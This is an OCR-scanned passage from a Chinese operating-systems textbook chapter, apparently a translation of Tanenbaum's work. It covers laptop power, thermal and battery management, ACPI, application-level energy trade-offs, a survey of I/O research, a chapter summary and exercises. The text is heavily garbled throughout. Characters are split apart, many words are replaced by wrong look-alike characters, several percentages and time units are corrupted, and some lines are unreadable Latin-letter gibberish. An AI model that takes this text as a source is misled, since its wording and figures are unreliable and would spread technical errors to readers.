那么 束 可 能 会 错过 到 来 的 消 上 筷 ， 这 显然 古 不 受 欢 迎 的 。 


针对 这 一 问题 ，Kravets 和 Krishnan (1998) 提出 了 一 种 有 效 的 解决 
方案 。 他 们 的 解决 方案 的 核心 利用 了 这 样 的 事实 ， 即 移动 的 计算 机 是 
与 固定 的 基站 通信 ， 而 固定 基站 具有 大 容量 的 内 存 与 磁盘 并 且 没 有 电 
源 限制 。 他 们 的 解决 方案 是 当 移 动 计算 机 将 要 关闭 无 线 电 设备 时 ， 让 
移动 计算 机 发 送 一 条 消 居 到 基站 。 从 那 时 起 ， 基 站 在 其 磁 表 上 缓冲 到 
来 的 消 轧 。 当 移动 计算 机 再 次 打开 无 线 电 设备 时 ， 它 会 通知 基站 。 此 
刻 ， 所 有 积 素 的 消 妃 可 以 发 送 给 移动 计算 机 。 


当 无 线 电 设备 关闭 时 ， 生 成 的 外 发 的 消 轧 可 以 在 移动 计算 机 上 缓 
冲 。 如 和 缓冲 区 有 十 满 的 危险 ， 可 以 将 无 线 电 设备 打开 并 且 将 排队 的 
消息 发 送 到 基站 。 


应 该 在 何 时 将 无 线 电 设备 关闭 ?一 种 可 能 是 让 用 户 或 应 用 程序 来 决 
定 。 男 一 种 方法 是 在 奉 干 秒 的 空 几 时间 之 后 将 其 关闭 。 应 该 在 何 时 将 
无 线 电 设备 再 次 打开 ?用 户 或 应 用 程序 可 以 再 一 次 做 出 决定 ， 或 者 可 以 
周期 性 地 将 其 打开 以 检查 到 来 的 消 恩 并 且 发 送 所 有 排队 的 消 轧 。 当 
然 ， 当 输出 缓冲 区 接近 填 满 时 也 应 该 将 其 打开 。 各 种 各 样 的 其 他 休 腿 
方法 也 十 可 能 的 。 


6. 热 量 管理 


一 个 有 一 点 不 同 但 是 仍然 与 能 量 相关 的 问题 是 热量 管理 。 现 代 
CPU 由 于 高 速度 而 会 变 得 非常 热 。 桌 面 计算 机 通常 拥有 一 个 内 部 电 风 
司 将 热 空 气 吹 出 机 箱 。 由 于 对 于 桌面 计算 机 来 说 减少 功率 消耗 通常 并 
不 是 一 个 重要 的 问题 ， 所 以 风 户 通常 是 始终 开 着 的 。 


对 于 笔记 本 电脑 ， 情 况 是 不 同 的 。 操 作 系 统 必须 连续 地 监视 温 
度 ， 当 温度 接近 最 大 可 允许 温度 时 ， 操 作 系 统 可 以 选择 打开 风 届 ， 这 
样 会 发 出 噪音 并 且 消 耗 电能 。 作 为 殖 代 ， 它 也 可 以 借助 于 降低 屏 需 青 
光 、 放 慢 CPU 速 度 、 更 为 激进 地 关闭 磁盘 等 来 降低 功率 消耗 。 
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7. 电 池 管 理 


在 过 去 ， 电 池 仅 仅 提 供电 流 直到 其 耗 干 ， 在 耗 干 时 电池 束 不 会 再 
有 电 了 。 现 在 笔记 本 电脑 使 用 的 是 稚 能 电池 ， 它 可 以 与 操作 系统 通 
信 。 在 请 求 时 ， 它 可 以 报告 其 状况 ， 例 如 最 大 电压 、 当 前 电压 、 最 大 
人 负 和 谷 、 当 前 负 何 、 最 大 消耗 速率 、 当 前 消耗 速率 等 。 大 多 数 笔记 本 电 
脑 拥 有 能 够 查询 与 显示 这 些 参数 的 程序 。 在 操作 系统 的 控制 下 ， 还 可 
以 命令 智能 电池 改变 各 种 工作 参数 。 


某 些 笔记 本 电脑 拥有 多 块 电池 。 当 操作 系统 检测 到 一 块 电池 将 要 
用 完 时 ， 它 必须 适度 地 安排 转换 到 下 一 块 电池 ， 在 转换 期 间 不 能 导致 
任何 故障 。 当 最 后 一 块 电池 濒临 耗 尽 时 ， 操 作 系 统 要 负责 同 用 户 发 出 
警告 然后 促成 有 序 的 关机 ， 例 如 ， 确 保 文 件 系 统 不 被 破坏 。 


8. 张 动 程序 接口 


Windows 系 统 拥有 一 个 进行 电源 管理 的 精巧 的 机 制 ， 称 为 ACPI 
(Advanced Configuration and Power Interface， 高 级 配置 与 电源 接 
O) 。 操 作 系统 可 以 向 任何 符合 标准 的 驱动 程序 发 出 命令 ， 要 求 它 报 
告 其 设备 的 性 能 以 及 它们 当前 的 状态 。 当 与 即 揪 即 用 相 结合 时 ， 该 特 


性 尤其 重要 ， 因 为 在 系统 刚刚 引导 之 后 ， 操 作 系 统 甚 至 还 不 知道 存在 
什么 设备 ， 更 不 用 说 它们 关于 能 量 消耗 或 电源 管理 的 属性 了 。 


ACPI 还 可 以 发 送 命令 给 碟 动 程序 ， 命 令 它 们 削减 其 功 耗 水 平 〈 当 
然 要 基于 早先 获悉 的 设备 性 能 ) 。 还 存在 某 些 其 他 方式 的 通信 。 符 别 
地 ， 当 一 个 设备 (例如 键 副 或 鼠标 ， 在 经 历 了 一 个 时 期 的 空间 之 后 检 
测 到 活动 时 ， 这 是 一 个 信号 让 系统 返回 到 (接近 ) 正常 运转 。 


5.8.3 ”应 用 程序 问题 


到 目前 为 止 ， 我 们 了 解 了 操作 系统 能 够 降低 各 种 类 型 的 设备 的 能 
量 使 用 量 的 方法 。 但 是 ， 还 存在 着 另 一 种 方法 : 指示 程序 使 用 较 少 的 
能 量 ， 即 使 这 意味 着 提供 低劣 的 用 户 体验 (低劣 的 体验 也 比 电 池 耗 干 
并 且 屏 幕 烛 炙 时 没有 体验 要 好 ) 。 一 般 情 况 下 ， 当 电池 的 电荷 低 于 某 
个 国 值 时 传递 这 样 的 信息 ， 然 后 由 应 用 程序 负 和 员 在 退化 性 能 以 延长 电 
池 寿 命 与 维持 性 能 并 且 冒 着 用 光电 汇 的 危险 之 间作 出 决定 。 


这 里 出 现 的 一 个 问题 是 程序 怎样 退化 其 性 能 以 廊 省 能 量 ?Flinn 和 
Satyanarayanan (2004) 研究 了 这 一 问题 ， 他 们 提供 了 退化 的 性 能 怎样 
能 够 方 省 能 量 的 4 个 例子 。 我 们 现在 就 看 一 看 这 些 例子 。 


在 他 们 的 研究 中 ， 信 息 以 各 种 形式 呈现 给 用 户 。 当 退化 不 存在 
时 ， 呈 现 的 是 最 优 可 能 的 信息 。 当 退化 存在 时 ， 呈 现 给 用 户 的 信息 的 
(RARE (准确 度 ) 比 它 能 够 达到 的 保 真 度 要 差 。 我 们 很 快 束 会 看 到 这 
样 的 例子 。 


为 了 测量 能 量 使 用 量 ，Flinn 和 Satyanarayanan 发 明了 一 个 称 为 
PowerScope 的 软件 工具 。PowerScope 所 做 的 事情 是 提供 一 个 程序 的 电 
能 使 用 量 的 概要 剖析 。 为 了 使 用 PowerScope， 计 算 机 必须 通过 一 个 软 
件 控制 的 数字 万 用 表 接 通 一 个 外 部 电源 。 使 用 万 用 表 ， 软 件 可 以 读 出 
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并 且 将 这 些 数据 写 到 一 个 文件 中 。 当 程序 终止 后 ， 对 文件 进行 分 析 束 
可 以 给 出 每 个 过 程 的 能 量 使 用 量 。 这 些 测量 形成 了 他 们 的 观察 结果 的 
基础 。 他 们 还 利用 硬件 能 量 节 约 测量 并 且 形 成 了 基准 线 ， 对 照 该 基准 
线 测量 了 退化 的 性 能 。 


测量 的 第 一 个 程序 是 一 个 视频 播放 器 。 在 未 退化 模式 下 ， 播 放大 
以 全 分 辨 这 和 彩色 方式 每 秒 播放 30 帧 。 一 种 退化 形式 是 舍弃 彩色 信息 
并 且 以 墨 日 方式 显示 视频 。 另 一 种 退化 形式 是 降低 帧 速率 ， 这 会 导致 
闪烁 并 且 使 电影 择 现 树 动 的 质量 。 还 有 一 种 退化 形式 是 在 两 个 方向 上 
减少 像素 数目 ， 或 者 是 通过 降低 空间 分 辨 紊 ， 或 者 是 使 显示 的 图 像 更 
小 。 对 这 种 类 型 的 测量 表明 市 省 了 大 约 30% 的 能 量 。 


第 二 个 程序 是 一 个 语音 识别 右 ， 它 对 专区 风 进 行 采 样 以 构造 波 
形 。 该 波形 可 以 在 笔记 本 电脑 上 进行 分 机， 也 可 以 通过 无 线 链 路 发 送 
到 固定 计算 机 上 进行 分 机 ， 这 样 做 节省 了 CPU 消耗 的 能 量 但 是 会 为 无 
线 电 设备 而 消耗 能 量 。 通 过 使 用 比较 小 的 词汇 量 和 比较 简单 的 声学 模 
型 可 以 实现 退化 ， 这 样 做 的 收益 大 约定 359%。 


第 三 个 例子 是 一 个 通过 无 线 链 路 获取 地 图 的 地 图 观察 右 。 退 化 在 
于 或 者 将 地 图 修 瘟 到 比较 小 的 尺度 ， 或 者 告诉 远程 服务 器 省 略 比 较 小 


的 道路 ， 从 而 需要 比较 少 的 位 来 传输 。 这 样 获得 的 收益 大 约 也 是 
35% ° 
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种 算法 ， 在 图 像 质 量 与 文件 大 小 之 间 进 行 中 。 这 里 的 收益 平均 只 
99%6。 总 而 言 之 ， 实 验 表 明 通 过 接受 一 些 质量 退化 ， 用 户 能 够 在 一 个 给 
定 的 电池 上 运行 更 长 的 时 间 。 


5.9 有关 输入 /输出 的 研究 


上 ， 而 不 是 一 般 性 的 1O。 研 究 的 目标 常 音 是 想方设法 改进 性 能 。 


磁盘 系统 是 一 个 恰当 的 事例 。 磁 盘 臂 调度 算法 曾经 是 一 个 流行 的 
研究 领域 (Bachmat 和 Braverman，2006; Zarandioon 和 Thomasim ， 
2006) ， 磁 盘 阵 列 也 是 如 此 (Arnan 等 人 ，2007) 。 优 化 完整 的 MO 路 
径 也 引起 了 人 们 的 兴趣 (Riska 等 人 ，2007) 。 还 有 关于 磁盘 工作 量 特 
性 的 研究 (RiskaflRiedel, 2006) 。 一 个 新 的 与 磁 副 相关 的 研究 领域 
是 高 性 能 内 存盘 (Birrell 等 人 ，2007; Chang, 2007) 。 设 备 驱 动 程序 
也 得 到 某 些 必要 的 关注 (Ball 等 人 ，2006; Ganapathy 等 人 ，2007; 
Padioleau 等 人 ，2006) 


另 一 种 新 的 存储 技术 是 MEMS (Micro-Electrical-Mechanical 
System， 微 电子 机 械 系统 ) ， 它 潜在 地 可 以 取代 磁盘 ， 或 者 至 少 是 磁 
盘 的 补充 (Rangaswami= A, 2007; Yu A, 2007) 。 男 一 个 新 兴 的 
研究 领域 是 如 何在 磁盘 控制 器 内 部 最 好 地 利用 CPU， 例 如 ， 为 了 改进 
PERE (Gurumurthi, 2007) 或 者 是 为 了 检测 病毒 (Paul 等 人 ，2005) 。 


稍稍 让 人 吃惊 的 是 ， 身 份 低 下 的 时 钟 仍然 是 研究 的 主题 。 为 了 所 
供 更 好 的 分 辨 率 ， 某 些 操作 系统 在 1000Hz 的 时 钟 下 运行 ， 这 会 导致 相 


当 大 的 开销 。 摆 脱 这 一 开销 正 是 新 兴 的 研究 课题 (Etsion 等 人 ， 
2003; Tsafir 等 人 ，2005) 


瘦 客 户 机 也 是 相当 引 人 注 目的 研究 主题 (Kissler#lHoyt, 2005; 
Ritschard, 2006; Schwartz#llGuerrazzi, 2005) œ 


考虑 到 研究 笔记 本 电脑 的 为 数 众 多 的 计算 机 科学 家 ， 并 且 考 虑 到 
大 多 数 笔 记 本 电脑 微不足道 的 电池 寿命 ， 看 到 在 利用 软件 技术 减少 电 
能 消耗 方面 有 巨大 的 研究 兴趣 承 不 足 为 奇 了 。 人 研究 中 的 特别 主题 包 
括 : 编写 应 用 程序 代码 以 最 大 化 磁盘 空闲 时 间 (Son 等 人 ，2006) ， 
当 使 用 比较 少时 让 磁盘 降低 转速 (Gurumurthi® A, 2003) ， 使 用 程 
序 模型 预测 无 线 网 卡 何 时 可 以 关闭 (Hom 和 Kremer，2003) , TE 
VoIP 的 电能 (Gleeson 等 人 ，2006) ， 调 碍 安全 性 的 能 量 代价 (Aaraj 等 
人 ，2007) ， 以 能 源 效率 高 的 方式 执行 多 媒体 调度 (Yuan 和 
Nahrstedt, 2006) ， 以 及 让 内 置 的 摄像 机 检测 是 否 有 人 在 看 显示 器 并 
且 在 没有 人 看 的 时 候 将 其 关闭 (Dalton 和 Ellis，2003) 。 在 低 端 ， 另 
一 个 热门 话题 是 传感器 网 络 中 能 源 的 使 用 (Min 等 人 ，2007; Wang 和 
Xiao, 2006) 。 而 在 高 端 ， 在 大 型 服务 器 园区 中 节省 能 源 也 引起 人 们 
的 关注 (Fan 等 人 ，2007; Tolentino 等 人 ，2007) 。 
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输入 /输出 是 一 个 经 常 被 忽略 但 是 十 分 重要 的 话题 。 任 何 一 个 操作 
系统 都 有 大 量 的 组 分 与 WO 有 关 。1O 可 以 用 三 种 方式 来 实现 。 第 一 是 
程序 控制 TO， 在 这 种 方式 下 主 CPU 输 入 或 输出 每 个 字 节 或 字 并 且 亲 置 
在 一 个 密封 的 循环 中 等 待 ， 直 到 它 能 够 获得 或 者 发 送 下 一 个 字 节 或 
字 。 第 二 是 中 断 驱 动 的 /O， 在 这 种 方式 下 CPU 和 针对 一 个 字 市 或 字 开 始 
IO 传送 并 且 离 开 去 做 别 的 事情 ， 直 到 一 个 中 断 到 来 发 出 信号 通知 MO 
完成 。 第 三 是 DMA， 在 这 种 方式 下 有 一 个 单独 的 必 斤 管理 着 一 个 数据 
块 的 完整 传送 过 程 ， 只 有 当 整 个 数据 块 完成 传送 时 才 引 发 一 个 中 断 。 


IO 可 以 组 织 成 4 个 层次 : 中断 服务 程序 、 设 备 驱 动 程序 、 与 设备 
无 关 的 IO 软件 和 运行 在 用 户 空间 的 MO 库 与 假 脱 机 程序 。 设 备 弛 动 程 
序 处 理 运 行 设备 的 细节 并 且 加 操作 系统 的 其 余部 分 提供 统一 的 接口 。 
与 设备 无 关 的 WO 软件 做 类 似 缓冲 与 错误 报告 这 样 的 事情 。 


盘 具 有 多 种 类 型 ， 包 括 人 磁盘 、RAID 和 各 类 光盘 。 人 磁盘 辟 调 度 算法 
经 常用 来 改进 磁盘 性 能 ， 但 是 虚拟 几何 规格 的 出 现 使 事情 变 得 十 分 复 
杂 “。 通 过 将 两 块 磁盘 组 成 一 对 ， 可 以 构造 稳定 的 存储 介质 ， 具 有 茶 些 
有 用 的 性 质 。 


时 钟 可 以 用 于 跟 踩 实际 时 间 ， 限 制 进程 可 以 运行 多 长 时 间 ， 人 处 理 
监视 定时 器 ， 以 及 进行 记 账 。 


面 问 字符 的 终端 具有 多 种 多 样 的 问题 ， 这 些 问题 涉及 特殊 的 字符 
如 何 输入 以 及 特殊 的 转 义 序列 如 何 输出 。 输 入 可 以 采用 原始 模式 或 加 
工 模式 ， 取 决 于 程序 对 于 输入 需要 有 多 少 控制 。 针 对 输出 的 转 义 序列 
挥 制 着 光标 的 移动 并 且 允 许 在 屏 人 右上 插入 和 删除 文本 。 


大 多 数 UNIX 系 统 使 用 X 窗 口 系 统 作为 用 户 界 面 的 基础 。 它 包含 与 
特殊 的 库 相 绑 定 并 发 出 绘图 命令 的 程序 ， 以 及 在 显示 右上 执行 绘图 的 


AR a ° 


许多 个 人 计算 机 使 用 GUI 作为 它们 的 输出 。GUI 基 于 WIMP 范 式 : 
窗口 、 图 标 、 荣 单 和 定点 设备 。 基 于 GUI 的 程序 一 般 是 事件 张 动 的 ， 
当 键 盘 事 件 、 鼠 标 事件 和 其 他 事件 发 生 时 立刻 会 被 发 送 给 程序 以 便 处 
理 。 在 UNIX 系 统 中 ，GUI 几 乎 总 是 运行 在 X 之 上 。 


瘦 客 户 机 与 标准 PC 相 比 具有 某 些 优势 ， 对 用 户 而 言 ， 值 得 注意 的 
是 简单 性 并 且 需 要 较 少 维护 。 对 THINC 瘦 客户 机 进行 的 实验 表明 ， 以 
五 条 侧 单 的 原 语 束 能 制造 出 具有 民 好 性 能 的 客户 机 ， 即 使 对 于 视频 也 
征 如 此 。 


最 后 ， 电 源 管 理 对 于 笔记 本 电脑 来 说 是 一 个 主要 的 问题 ， 因 为 电 
池 寿 命 是 有 限 的。 操作 系统 可 以 采用 各 种 技术 来 减少 功率 消耗 。 通 过 


策 牲 某 些 质量 以 换取 更 长 的 电池 寿命 ， 应 用 程序 也 可 以 做 出 页 献 。 


习题 
1. 沪 片 投 术 的 进展 已 经 使 得 将 整个 控制 器 包括 所 有 总 线 访问 逻辑 
放 在 一 个 便宜 的 芯片 上 成 为 可 能 。 这 对 于 图 1-5 的 模型 具有 什么 影响 ? 


2. 已 知 图 5-1 列 出 的 速度 ， 是 否 可 能 以 全 速 从 一 台 扫 摘 仪 扫描 文档 
并 且 通 过 802.11g 网 络 对 其 进行 传输 ?请 解释 你 的 答案 。 


3. 图 5-3b 显 示 了 即使 在 存在 单独 的 总 线 用 于 内 存 和 用 于 WO 设备 的 
情况 下 使 用 内 存 映射 LO 的 一 种 方法 ， 也 就 是 说 ， 首 先 尝试 内 存 总 线 ， 
如 果 失 败 则 党 试 VO 总 线 。 一 名 聪明 的 计算 机 科学 专业 的 学 生 想 出 了 一 
个 改进 办 法 : 并 行 地 莹 试 两 个 总 线 ， 以 加 快 访问 MO 设备 的 过 程 。 你 认 
为 这 个 想法 如 何 ? 


4. 假 设 一 个 系统 使 用 DMA 将 数据 从 磁 副 控制 占 传 送 到 内 存 。 进 一 
步 假设 平均 花费 ti ns 获得 总 线 ， 并 且 花 费 t, ns 在 总 线 上 传送 一 个 字 (ty 
>>ty) 。 在 CPU 对 DMA 控 制 器 进行 编程 之 后 ， 如 果 (a) 采用 一 次 
FRA, (b) 采用 突 发 模式 ， 从 磁盘 控制 器 到 内 存 传送 1000 个 字 需 
要 多 少时 间 ? 假设 癌 磁 强 欣 制 邵 发 送 命令 需要 获取 总 线 以 传输 一 个 
字 ， 并 且 应 答 传输 也 需要 获取 总 线 以 传输 一 个 字 。 


5. 假 设 一 台 计 算 机 能 够 在 10ns 内 读 或 者 写 一 个 内 存 字 ， 并 且 假 设 
当中 断 发 生 时 ， 所 有 32 位 寄存 峰 连 同 程序 计数 器 和 PSW 被 压 入 堆栈 。 


该 计算 机 每 秒 能 够 处 理 的 中 断 的 最 大 数目 是 多 少 ? 


6.CPU 体 系 结构 设计 师 知 道 操作 系统 编写 者 痛恨 不 精确 的 中 断 。 
取悦 于 OS 人 群 的 一 种 方法 是 当 得 到 一 个 中 断 信 号 通知 时 ， 让 CPU 停止 
发 射 指令 ， 但 是 允许 当前 正在 执行 的 指令 完成 ， 然 后 强制 中 断 。 这 一 
方案 是 否 有 缺点 ? 请 解释 你 的 答案 。 


7. 在 图 5-9b 中 ， 中 断 直 到 下 一 个 字符 输出 到 打印 机 之 后 才 得 到 应 
答 。 中 断 在 中 断 服务 程序 开始 时 立刻 得 到 应 答 是 否 同样 可 行 ?如 果 是 ， 
请 给 出 像 本 书 中 那样 在 中 断 服 务 程序 结束 时 应 答 中 断 的 一 个 理由 。 如 
RAN, ATA? 


8. 一 合计 算 机 具有 如 图 1-6a 所 示 的 三 阶段 流水 线 。 在 每 一 个 时 钟 周 
期 ， 一 条 新 的 指令 从 PC 所 指向 的 地 址 处 的 内 存 中 取出 并 放 入 流水 线 ， 
同时 PC 值 增加 。 每 条 指令 恰好 占据 一 个 内 存 字 。 已 经 在 流水 线 中 的 指 
令 每 个 时 钟 周期 前 进 一 个 阶段 。 当 中 断 发 生 时 ， 当 前 PC 压 入 堆栈 ， 并 
且 将 PC 设置 为 中 断 处 理 程序 的 地 址 。 然 后 ， 流 水 线 右 移 一 个 阶段 并 且 
中 断 处 理 程序 的 第 一 条 指令 被 取 入 流水 线 。 该 机 左 具 有 精确 的 中 断 吗 ? 
请 解释 你 的 答案 。 


9. 一 个 典型 的 文本 打印 页 面包 含 50 行 ， 每 行 80 个 字符 。 设 想 某 一 
台 打 印 机 每 分 钟 可 以 打印 6 个 页 面 ， 并 且 将 字符 写 到 打印 机 输出 寄存 天 
的 时 间 很 短 以 至 于 可 以 忽略 。 如 果 打 印 每 一 个 字符 要 请 求 一 次 中 断 ， 


而 进行 中 断 服务 要 花费 总 计 50phs 的 时 间 ， 那 么 使 用 中 断 驱 动 的 VO 来 运 
行 该 打印 机 有 没有 意义 ? 


10. 请 解释 OS 如 何 帮 助 安装 新 的 驱动 程序 而 无 须 重新 编译 OS 。 
11. 以 下 各 项 工作 是 在 四 个 IO 软件 层 的 哪 一 层 完成 的 ? 

al) 为 一 个 磁盘 读 操作 计算 人 磁道、 扇 区 、 磁 头 。 

b) 向 设备 寄存 器 写 命令 。 

c) 检 查 用 户 是 否 允 许 使 用 设备 。 

d) 将 二 进 制 整数 转换 成 ASCII 码 以 便 打 印 。 


12. 一 个 局 域 网 以 如 下 方式 使 用 : 用 户 发 出 一 个 系统 调用 ， 请 求 将 
数据 包 写 到 网 上 ， 然 后 操作 系统 将 数据 复制 到 一 个 内 核 缓冲 区 中 ， 再 
将 数据 复制 到 网 络 控 制 器 接口 板 上 。 当 所 有 数据 都 安全 地 存放 在 控制 
器 中 时 ， 再 将 它们 通过 网 络 以 10Mb/s 的 速率 发 送 。 在 每 一 位 被 发 送 
后 ， 接 收 的 网 络 控 制 絮 以 每 微 秒 一 位 的 速率 保存 它们 。 当 最 后 一 位 到 
达 时 ， 目 标 CPU 被 中 断 ， 内 核 将 新 到 达 的 数据 包 复 制 到 内 核 缓冲 区 中 
进行 检查 。 一 旦 判明 该 数据 包 十 发 送 给 哪个 用 户 的 ， 内 核 束 将 数据 复 
制 到 该 用 户 空 间 。 如 果 我 们 假设 每 一 个 中 断 及 其 相关 的 处 理 过 程 伦 费 
Ims 时 间 ， 数 据 包 为 1024 字 节 (AREA) ， 并 且 复 制 一 个 字 市 花费 
1hs 时 间 ， 那 么 将 数据 从 一 个 进程 转 储 到 另 一 个 进程 的 最 大 速率 是 多 
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单 起 见 ， 假 设 获 得 返回 应 答 的 时 间 非 常 短 ， 可 以 忽略 不 计 。 


13. 为 什么 打印 机 的 输出 文件 在 打印 前 通常 都 假 脱 机 输出 在 磁盘 
E? 


14.3% RAID RIE FA — AAE Re EMER e HA2 
级 RAID 的 意义 是 什么 ?毕竟 2 级 RAID 也 只 能 纠正 一 位 错误 而 且 需 要 更 
多 的 驱动 器 


15. 如 果 两 个 或 更 多 的 驱动 絮 在 很 短 的 时 间 内 朋 江 ， 那 么 RAID 束 
可 能 失效 。 假 设 在 给 定 的 一 小 时 内 一 个 驱 动 右 月 并 的 概率 古 p， 那 么 在 
给 定 的 一 小 时 内 有 具有 kk 个 驱动 万 的 RAID 失 歼 的 概率 是 多 少 ? 


ua 


16. 从 读 性 能 、 写 性 能 、 空 间 开 销 以 及 可 徘 性 方面 对 0 级 RAID 到 5 


级 RAID 进 行 比较 。 


17. 为 什么 光 存 储 设备 天 生地 比 磁 存储 设备 具有 更 高 的 数据 密度 ? 
注意 ,本题 需要 某 些 高 中 物理 以 及 磁场 是 如 何 产 生 的 知识 。 


18. 光 盘 和 磁盘 的 优点 和 缺点 各 是 什么 ? 


19. 如 采 一 个 磁盘 控制 磊 没 有 内 部 缓冲 ， 一 旦 从 人 磁 列 上 接收 到 字 节 
束 将 它们 写 到 内 存 中 ， 那 么 交错 编 号 还 有 用 吗 ? 请 讨论 。 
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100 柱 面 的 区 域 ， 不 同 的 区 域 分 别 包含 160 个 、200 个 、240 个 和 280 个 而 
区 。 假 设 每 个 而 区 包 侣 512 字 节 ， 相 邻 柱 面 间 的 平均 寻 道 时 间 为 1ms， 
并 且 人 磁盘 转速 为 7200rpm。 计 算 a) 磁 盘 容 量 、b) 最 优 人 磁道 斜 进 以 及 0c) 最 
大 数据 传输 率 。 


22. 一 个 侯 副 制造 商 拥 有 两 种 5.25 闫 寸 的 人 磁盘， 每 种 磁 副 都 具有 10 
000 个 柱 面 。 新 磁盘 的 线性 记录 密度 是 老 磁 盘 的 两 倍 。 在 较 新 的 弛 动 郁 
上 哪个 磁盘 的 特性 更 好 ， 哪 个 无 变化 ? 


23. 一 个 计算 机 制造 商 决 定 重 新 设计 Pentium 人 硬盘 的 分 区 表 以 提供 
四 个 以 上 的 分 区 。 这 一 变化 有 什么 后 采 ? 


24. 令 盘 请 求 以 柱 面 10、22、20、2、40、6 和 38 的 次 序 进 入 磁盘 驱 
动 器 。 寻 道 时 每 个 柱 面 移 动 需要 6ms， 以 下 各 算法 所 需 的 寻 道 时 间 是 


Zeb? 
a) 先 来 先 服务 。 
b) 最 近 柱 面 优先 。 


c 电 梯 算 法 〈 初 始 向 上 移动 ) 。 


在 各 情形 下 ， 假 设 磁 臂 起 始 于 柱 面 20。 


25. 调 度 役 盘 请 求 的 电 樟 算 法 的 一 个 微小 更 改 是 总 是 沿 相同 的 方 同 
扫描 。 在 什么 方面 这 一 更 改 的 算法 优 于 电梯 算法 ? 


26. 在 讨论 使 用 非 易 失 性 RAM 的 稳定 的 存储 器 时 ， 掩 饰 了 如 下 要 
点 。 如 有 果 稳 定 写 完 成 但 是 在 操作 系统 能 够 将 无 效 的 块 编号 写 入 非 易 失 
PERAMZBIAE SHA, BLAS AT ARIAL RFARFS KES 
EKITE MEAN AT ES OT HEE RR o 
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CPUARin, kak ay AAKER ARNS 〈 写 操作 或 者 已 完成 ， 或 
者 完全 没有 发 生 ) 。 如 果 在 恢复 的 过 程 中 CPU 再 次 月 误 ， 这 一 特性 是 
否 还 保持 ? 请 解释 你 的 答案 。 


28. 某 计算 机 上 的 时 钟 中 断 处 理 程序 每 一 时 钟 滴答 需要 2ms (包括 
进程 切换 的 开销 ) ， 时 钟 以 60Hz 的 频率 运行 ， 那 么 CPU 用 于 时 钟 处 理 
的 时 间 比 例 是 多 少 ? 


29. 一 台 计 算 机 以 方 波 模式 使 用 一 个 可 编程 时 钟 。 如 果 使 用 
500MHz 的 唱 体 ， 为 了 达到 如 下 时 钟 分 辨 率 ， 存 储 寄存 融 的 值 应 该 是 


多 少 ? 


a)lms (E — TAY PH) 。 


b)100hs. 


30. 一 个 系统 通过 将 所 有 未 决 的 时 钟 请 求 链接 在 一 起 而 模拟 多 个 时 
钟 ， 如 图 5-34 所 示 “。 假 设 当前 时 刻 是 5000， 并 且 存 在 针对 时 刻 5008、 
5012、5015、5029 和 5037 的 未 决 的 时 钟 请 求 。 请 指出 在 时 刻 5000、 
5005 和 5013 时 时 钟头 、 当 前 时 刻 以 及 下 一 信号 的 值 。 请 指出 在 时 刻 23 
时 时 钟头 、 当 前 时 刻 以 及 下 一 信号 的 值 。 


31. 许 多 UNIX 版 本 使 用 一 个 32 位 无 符号 整数 作为 从 时 间 原 点 计算 
的 秒 数 来 跟踪 时 间 。 这些 系 统 什 么 时 候 会 溢出 (年 与 月 ) ? 你 盼望 这 
样 的 事情 实际 发 生 吗 ? 


32. 一 个 位 图 模式 的 终端 包含 1280x960 个 像素 。 为 了 滚动 一 个 窗 
O, CPU (或 者 控制 器 ) 必须 向 上 移动 所 有 的 文本 行 ， 这 是 通过 将 文 
本 行 的 所 有 位 从 视频 RAM 的 一 部 分 复制 到 另 一 部 分 实现 的 。 如 果 一 个 
特殊 的 窗口 高 60 行 宽 80 个 字符 (总 共 4800 个 字符 ) ， 每 个 字符 框 宽 8 个 
像素 高 16 像 素 ， 那 么 以 每 个 字 节 50ns 的 复制 速率 滚动 整个 窗口 需要 多 
长 时 间 ? 如 果 所 有 的 行 都 是 80 个 字符 长 ， 那 么 终端 的 等 价 波 特 率 是 多 


少 ?将 一 个 字符 显示 在 屏幕 上 需要 5hs， 每 秒 能 够 显示 多 少 行 ? 


33. 接 收 到 一 个 DEL (SIGINT) 字符 之 后 ， 显 示 驱 动 程序 将 丢弃 当 
前 排队 等 候 显 示 的 所 有 输出 。 为 什么 ? 


34. 在 最 初 IJBM PCH ETRE, ER T CRT ORS BIBI 
间 以 外 的 任何 时 间 同 视频 RAM 中 写 数 据 都 会 导致 屏幕 上 出 现 难看 的 斑 
上 态 。 一 个 屏幕 映像 为 25x80 个 字符 ， 每 个 字符 占据 8x8 像 到 的 方 框 。 每 
行 640 像 素 在 电子 束 的 一 次 水 平 扫 朱 中 绘 出 ， 需 要 人 花费 6hs， 包 括 水 平 
回 扫 。 屏 幕 每 秒 钟 刷新 60 次 ， 每 次 刷新 均 需 要 一 个 垂直 回 扫 期 以 便 使 
电子 束 回 到 屏 医 顶端 。 在 这 一 过 程 中 可 供 写 视 频 RAM 的 时 间 比 例 钙 多 


少 ? 


35 .计算机 系统 的 设计 人 员 期 望 鼠 标 移动 的 最 大 速率 为 20cm/s。 如 
果 一 个 鼠标 步 是 0.1mm， 并 且 每 个 鼠标 消息 3 个 字 节 ， 假 设 每 个 鼠标 步 


都 是 单独 报告 的 ， 那 么 鼠标 的 最 大 数据 传输 率 是 多 少 ? 


36. 基 本 的 加 性 颜色 是 红色 、 绿 色 和 监 色 ， 这 意味 着 任何 颜色 都 可 
以 通过 这 些 颜色 的 线性 谷 加 而 构造 出 来 。 某 人 拥有 一 张 不 能 使 用 全 24 
位 颜色 表示 的 彩色 照片 ， 这 可 能 吗 ? 


37. 将 字符 放置 在 位 图 模式 的 屏幕 上 ， 一 种 方法 是 使 用 BitBlt 从 一 
个 字体 表 复 制 位 图 。 假 设 一 种 特殊 的 字体 使 用 16x24 像 素 的 字符 ， 并 
日 采用 RGB 真 彩色 。 


(a) 每 个 字符 占用 多 少 字 体 表 空间 ? 


(b) 如 果 复 制 一 个 字 下 花费 100ns (包括 系统 开销 ) ， 那 么 到 屏幕 


的 输出 率 是 每 秒 多 少 个 字符 ? 


38. 假 设 复制 一 个 字 节 花费 10ns， 那 么 对 于 80 字 符 x25 行 文本 模式 
的 内 存 轴 射 的 屏幕 ， 完 全 重 写 屏幕 要 花费 多 长 时 间 ? 采用 24 位 彩色 的 
1024x768 像 素 的 图 形 屏幕 情况 怎样 ? 


39. 在 图 5-4 0 中 存在 一 个 窗口 类 需要 调用 RegisterClass 进 行 注册 ， 
在 图 5-38 中 对 应 的 X 窗 口 代码 中 ， 并 不 存在 这 样 的 调用 或 与 此 相似 的 
任何 调用 。 为 什么 ? 


40. 在 课文 中 我 们 给 出 了 一 个 如 何在 屏幕 上 夯 一 个 矩形 的 例子 ， 即 
使 用 Windows GDI: 


Rectangle(hdc, xleft, ytop, xright, ybottom) ; 


